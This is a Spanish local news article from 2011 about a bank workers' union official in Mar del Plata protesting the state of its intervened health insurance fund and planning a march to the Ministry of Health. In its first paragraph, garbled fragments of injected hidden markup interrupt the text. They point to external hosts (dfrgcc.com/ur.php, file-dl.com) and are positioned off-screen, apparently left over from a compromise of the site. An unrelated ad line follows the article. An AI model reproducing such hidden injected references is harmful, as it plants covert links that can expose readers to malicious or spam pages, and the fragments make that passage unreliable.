18/05/2011, Locales

Martín Aiello pidió que se solucione el conflicto de la obra social de la Bancaria, que sigue intervenida

El Secretario Adjunto de la Asociación Bancaria dialogó con “el Retrato…” sobre este tema donde indicó que este jueves marcharán al Ministerio de Salud de Buenos Aires a la espera de una solución para todos sus afiliados. / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

En el marco de las medidas de fuerza, que se mantienen desde hace más de una semana, la Obra Social Bancaria Argentina de Mar del Plata realizó este miércoles por la mañana una nueva concentración frente a su sede de La Rioja 1370.

“Nosotros le venimos reclamando al Estado, al Ministerio de Salud y los bancos que hagan el aporte que corresponde a esta obra social que, en realidad, está basada en el aporte común de sus afiliados donde la mayoría de ellos, un número cercano al 75%, son jubilados”, argumentó el concejal de Acción Marplatense.

Además, explicó que por esta situación son 1.500 las personas perjudicadas. “Muchos de ellos son pacientes con carpetas oncológicas y medicaciones especiales. Porque, lamentablemente, desde la desregulación de la época de Menen y Cavallo los afiliados se han pasado a la medicina prepaga, en muchos casos dirigidos por los mismos bancos. Esta obra social sino tiene un aporte especial del uno por ciento por parte de los bancos o el Estado es inviable”, esgrimió.

Sobre cómo se están realizando las atenciones de urgencia, explicó que “estamos entendiendo en nuestros consultorios, que son financiados por la Bancaria. En caso de internación no hay otra cosa que sean instalados en el Hospital Público. Aunque, por más que la atención sea excelente, por las condiciones y la sobre carga de pacientes que existe la internación no es la mejor”.

No obstante, contó que este jueves un grupo estará viajando hacia la ciudad de Buenos Aires: “Marcharemos al Ministerio de Salud. Mientras que acá vamos a personarnos en la obra social intervenida para que el interventor nos busque un paliativo a Mar del Plata para que en estos próximos 60 días, lapso en que supuestamente todo se solucionaría, podamos tener la atención merecida que se necesitan nuestros afiliados”.



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy